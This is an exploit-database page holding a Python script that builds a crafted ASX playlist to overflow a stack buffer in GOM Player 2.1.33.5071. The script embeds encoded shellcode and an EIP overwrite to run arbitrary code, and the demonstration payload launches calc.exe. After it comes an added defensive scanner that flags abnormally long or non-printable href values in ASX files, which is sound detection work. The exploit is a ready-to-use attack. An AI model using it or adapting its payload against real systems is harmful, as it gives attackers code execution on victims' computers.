0day.today - Biggest Exploit Database in the World.
GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit
```python
# Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution.
# Version: 2.1.33.5071
# Date: 30-11-2011
# Author: Debasish Mandal
# Email : debasishm89@gmail.com
# Software Link: http://www.gomlab.com/eng/GMP_download.html
# Category:: Local
# Tested on: Windows XP SP2.
# Many Many Thanks to P.V.Eeckhoutte & Nilanjan De
#!/usr/bin/python
print "#############################################################################################"
print "## GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution.#"
print "## Version: 2.1.33.5071 #"
print "## Author :: Debasish Mandal #"
print "## Email : debasishm89@gmail.com #"
print "## Blog: http://www.debasish.in/ #"
print "#############################################################################################"
raw_input("[*] Press Enter to generate the crafted ASX...")
size = 2046
#Shellcode WinExec "Calc.exe" Unicode
shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI"
shellcode += "AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl"
shellcode += "iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8"
shellcode += "qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4"
shellcode += "LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li"
shellcode += "z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN"
shellcode += "K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu"
shellcode += "48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA"
buff = ''
buff += '<asx version = "3.0" ><entry><title>ArirangTV</title><ref href = "WWW.'
align = "A"                   # align to first instruction
align += "\x55\x41\x58\x41"   # push ebp, pop eax
align += "\x05\x11\x11"       # add eax,11001100
align += "\x41"               # align
align += "\x2d\x10\x11"       # sub eax,11001000
align += "\x41" * 109         # padding
align += "\x40\x41\x40"       # 2x inc eax
align += "\x41"               # align
buff += align
buff += shellcode
buff += "\x41"*(size - len(align) - len(shellcode))
#eip
buff += "\xd9\x57"            # CALL EBP - 0x005700d9
# top of the stack
buff += "\x46"*2
buff += "\x47"*100
buff +='"/></entry></asx>'
f = open('LIST.asx','w')
f.write(buff)
f.close()
print "[*] Crafted .m3u File generated"
print "[*] Exit"
# 0day.today [2024-06-30] #
```
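A defensive check for the file shape the script above produces, added here as an example and not part of the original exploit or the author's code: it scans an ASX playlist for `href` attribute values that are abnormally long or contain non-printable bytes. The function name `scan_asx`, the 1024-byte threshold, and both sample playlists (constructed, with inert filler only) are assumptions.

```python
import re

# Assumption: no legitimate playlist URL approaches this length; tune per environment.
MAX_HREF_LEN = 1024

# ASX is XML-like, but names are case-insensitive and a crafted file may hold raw
# control bytes, so scan the bytes directly instead of using a strict XML parser.
# The value runs to the matching closing quote, or to end of data if unterminated.
HREF_RE = re.compile(rb'href\s*=\s*(["\'])(.*?)(?:\1|\Z)', re.IGNORECASE | re.DOTALL)


def scan_asx(data, max_len=MAX_HREF_LEN):
    """Return one finding per suspicious href attribute in an ASX file's bytes."""
    findings = []
    for match in HREF_RE.finditer(data):
        value = match.group(2)
        reasons = []
        if len(value) > max_len:
            reasons.append("href length %d exceeds %d" % (len(value), max_len))
        # Heuristic: a media URL should be printable ASCII.
        raw = sum(1 for b in value if b < 0x20 or b > 0x7E)
        if raw:
            reasons.append("%d non-printable byte(s) in href" % raw)
        if reasons:
            findings.append({"offset": match.start(),
                             "length": len(value),
                             "reasons": reasons})
    return findings


# Constructed samples: an ordinary playlist, and one with an oversized href.
BENIGN = (b'<asx version="3.0"><entry><title>Clip</title>'
          b'<ref href="http://media.example/clip.wmv"/></entry></asx>')
OVERSIZED = (b'<ASX version = "3.0" ><entry><ref HREF = "WWW.'
             + b"A" * 3000 + b"\x11" + b'"/></entry></asx>')

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, scan_asx(blob))
```

The same function can run at a mail or web gateway, or over a directory of `.asx` files, before they reach a player.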